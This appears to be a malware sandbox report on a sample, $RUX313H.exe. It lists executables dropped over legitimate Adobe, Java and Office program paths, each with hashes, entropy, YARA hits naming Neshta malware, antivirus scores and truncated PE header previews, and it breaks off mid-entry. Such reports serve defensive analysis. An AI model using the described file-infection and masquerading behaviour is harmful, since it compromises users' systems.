                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4710468077094445
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmGDLaAcF7u9nAlRPL/a9L:sr85C3+u9n8T/aZ
                                                                        MD5:AAB384021CCD99B08F91D550581310EA
                                                                        SHA1:16DE7D37E9B8312551F1EAB96FCAC0CBBA73A166
                                                                        SHA-256:3626F66835F8FD11C6515E55E9CC7B6DA710FFCA9101632CBB69D2F7D2390E71
                                                                        SHA-512:D56589D12F983FF96FE8FF4B9AC4FF0CAD531036272308BB2A2CD4A101D7998005397E8FE50A9E4D3B1EC3E203908DC4EE5071545A844BBB497CF6FE67E0B020
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.426705359459557
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJChNBfkv2pymXndR1wF3u20:sr85Chi3m3pwF+20
                                                                        MD5:84E45C930A79BBB3239D4929503FC38C
                                                                        SHA1:2AED49DEAF2CF13CFAEA97FE5CF217A01E4BD08A
                                                                        SHA-256:CAC1AE6F9B9623E171517C8AE1609A8E21626D9FBF3EE400325E371ACE843444
                                                                        SHA-512:7AFA1BF9237E28AA97918E9806A045A565154599C4DD0882C8B106D25E5410EFCCBDCD01015E156B724009F2A884CA5E1D43C398453769BF9B3021195C6D3FA8
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.599158686971261
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKhp8N3YERomt8JCeToWZmKbt1H0jKWo:sr85CKn8N3YEuTofE1H0jKWo
                                                                        MD5:294D120414736A7579445CCCA78F505C
                                                                        SHA1:4DC265A2FC75AF686DA3EC830BF9C0072AF14581
                                                                        SHA-256:AF7E482890D77DAD13F0D5A1377DEFA83CF2D802DC1444A69FD17A464C4A446C
                                                                        SHA-512:8DC9F174875DD7012030EC6FE1624AAA99E068DD464BE4AEFDBA9699C39969DF0E52214B90BC46ACE204D2505DDD69C46D674DE39A6BFAA3DE213DFCA66ED196
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.6085003171859364
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKN/MZzagYK5o2IQJ/rVSgvV:sr85C/qA/WadUDFBZz9
                                                                        MD5:89DC2A4E5290AE1297C2281B5CD35068
                                                                        SHA1:1D091812669D1D0CF0293B9D495599BF257434D9
                                                                        SHA-256:5116F46AD2BE5B402FAD8B89350F671576D995ECCF91863D827984AE42319596
                                                                        SHA-512:2CECAFADFE911CAEF8F735192F7F1D60305BBBA6A390E13CDB4B5055413D931B75F276086F18AE36E32FEF31DD3B37FDDECD1FDB9F4EC12938B1EFABCD6D7E07
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.62851477500423
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCsrkFN/GjcAShJITZOG8i4e53hS5PobC:sr85Csk0cA6JITt8cXbC
                                                                        MD5:61694544EA704A28532F4EC0319AC735
                                                                        SHA1:F6ED53FF2792797D40ECA888567873F0570698E6
                                                                        SHA-256:4183F6849773F9EED9279D5237C93719511F605276F0EB9BF2E8B2258BBAED09
                                                                        SHA-512:5004069D9A41811B63CD84A049757A2F2CB061D1D6999FAE9EC083C4AE3C850BAD9D59112B452118A0AA231A4F07145D03C62FDB699074F4610D4899A662C922
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.653521772684421
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Joe Security
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.656070779362061
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Joe Security
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.6397427450636055
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Joe Security
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.529062771218018
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPQ5vyh0tYhgw2azkO8rn85GF:sr85CPQ5vyhvcOQn2GF
                                                                        MD5:2FECE9074EC51CAA91DDEA7FBB4FFC54
                                                                        SHA1:35BD848191A5C14897883B9A11BECC6DB522A88F
                                                                        SHA-256:B4D954F33DDFC952FDD208E3EFFCD6A1E442DE8D07C9148C4771986F781C294F
                                                                        SHA-512:F9C3249A39CB4206E495EED2A5C6130CCB04874FBFCB9D0D3D854B6625791E88C2BF29A7AE6C5E57B2B5C4EF25F39AA7BAA4B8C989A3A62D9FCFAF9116417AEB
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4112170834310565
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUN8aliPc8ZbyHVftptXvVWi6N8rKca:sr85CU6i/XtXv7+8rKca
                                                                        MD5:BA5A5D15C15E1143A35B5ACB9DA43F23
                                                                        SHA1:BE948D6A40AE1221B2E093B6634D695EEDFAD323
                                                                        SHA-256:075242C15AEF5CC590E716651ED3F1F53A8BD23A37CFA60F827DBE60B7DA8918
                                                                        SHA-512:3E36FA618DF02872C1F5043318A8F945912FC5162F8C9ECE7FDA323F7D8AFD53157C00519E50DA9899DA6BF3117CA82011757B987726F968C3B7B5A632066EDA
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.374994892226591
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrNsxigdJqueeYUOc1wxNXI:sr85CCnneeVV1
                                                                        MD5:BED5A0265D4F2739606BD0C79DB41BDB
                                                                        SHA1:0EAE9CA564CC3B83B4B7CAAF64FED47567C8A6D1
                                                                        SHA-256:713E2E20A467272CF5E174DFF81954001170C7F92143A5F34C2FFAE9B85BDC04
                                                                        SHA-512:FAD8C0A7ED8FBCC7BC9704522B2A35C2BCEA68DE3A614009D49DE7F8C8B35F06DA12E5DA78EF8E96FF72983C33268046521C190C0BD0F8A644887A65DA44B2B8
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.305732261424221
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWdVJe84MtsqXZhbkALEwcyj3Y:sr85CKVYpqeyDY
                                                                        MD5:3A6E83146F925E67FD9BD350F823858C
                                                                        SHA1:030EF0512034AE6FFA06C7B42041252A56613799
                                                                        SHA-256:494DC48B1892964FB6D5CBB19DACBE990434EED9DEE1BD64D9E74D14681717F3
                                                                        SHA-512:F06ABB303461C6F016470C343DBDACB154C2575095B67B0A2620DBF6E7F799BEC18A6F5E3C678DB107F98764701DE33C75C1E6FC08ADD22FF6D486164DC17336
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.375840229458048
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUK78LyRHC/T5ICzzKgHiTs33fSQ19uk:sr85CUdGS2gHN3aQ1p
                                                                        MD5:8D7C662937FFE3C3AA129DD3BA7B887F
                                                                        SHA1:F67F3B5C32BF6CC3DEA744DAAB16177DD86DBFF6
                                                                        SHA-256:656ED573131580248ACC968FABBA2197657EAEE8DD6D0BA533A50DD34E74B603
                                                                        SHA-512:71235707D208BEA37FA95A5BD5EF10F768740621008A50B3E440C70B86039AC2428E8B7105A93921DD8DF659AD35C36BB4BFA2C922335680CC1660B48FD54B4A
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.461871956296466
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCqi4IvHjjWhQmgBhtV+mLtiqdSo:sr85CqThgpLTso
                                                                        MD5:CE04DA14A0724F9E950D41F9B2CC1643
                                                                        SHA1:EFF607BAD3A4CB05CC38065E45DC61555618A060
                                                                        SHA-256:D90265A2653E732290DD6617ADD54CA1B2981481AE6B6C18C570D4552C84E826
                                                                        SHA-512:6E548630AF301C8F472BACCB487C31E7E4092E3B25F439D585F36F0A24846C6C0F4A3AF34BE25389D9B9FDF6C1A03A9A8106F9FD777BFB4D1F824A29844E5803
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.119504084682648
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJxqs0y0gqotvngnYkJZZZZZZZZZZZZZz:JxqjQ+P04wsmJC2L4Y4YkvJt
                                                                        MD5:EF92B40044CB210120E9889CA1DC1D5C
                                                                        SHA1:EEDCB5BA7F70F04C3D25AD321C93F978E5E1C7A8
                                                                        SHA-256:016D35F82750ECF792D64A6CFF5D376DB69F2BA1D30BEF80978CCBE84ACFFD0B
                                                                        SHA-512:DBB2EC69392CFFA9ABC8EB0E2C979E5CD4F6A806E14D53F87E8D041E7F0D25816D13363FA66F97FB93DABA8E5CBB17D617029A87BBB31CDECE9A48745E321062
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):4.799951544005101
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbR+QDxQPcfwBOB6ZZZZZZZZZZZZZbJO:JxqjQ+P04wsmJCC+WxQ0lEJRaCA
                                                                        MD5:7078371E0D358B86D46D6CF87987C8CD
                                                                        SHA1:6F58E6F33BB9242034F7C6CDCF17B637C060C8BA
                                                                        SHA-256:2DE937273CBFE6AA5909EFD083FFE477DC7CF37739F12923E2B2FB1B1B6E17B1
                                                                        SHA-512:13449BFDB7AABDC75EC51F1FCB5FE95761C22E3F9E4D1A1CBB5BFC0A3F8FE2AB2FDC3ACD0BAA0D5BADDF0CD0DB390788C60B9C664C3E3FDCC29537347B83E4EF
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.05148718063145
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPkMrdYJnRQV6J4tuw62roH5lL1u:sr85C9rsRQIouwjQlL
                                                                        MD5:D4B144B9963B3114F1D938F44200AE62
                                                                        SHA1:F14C2F8BD9BD0CAC7A682D453C58B99858D6C0CE
                                                                        SHA-256:CB49C8EA020EABA89BB5032060928901AA90BA2530CD5D5467D15AAB489747DA
                                                                        SHA-512:80D70AAF806C46388447A4BF0DF9A98C7DBC211E290A60F3A30C560E09BF12BBDCDABB4DA0B945A8144CBE8D2B22CD4F0D9AFF4DBC33E8FBCB7DAA8244CEDA95
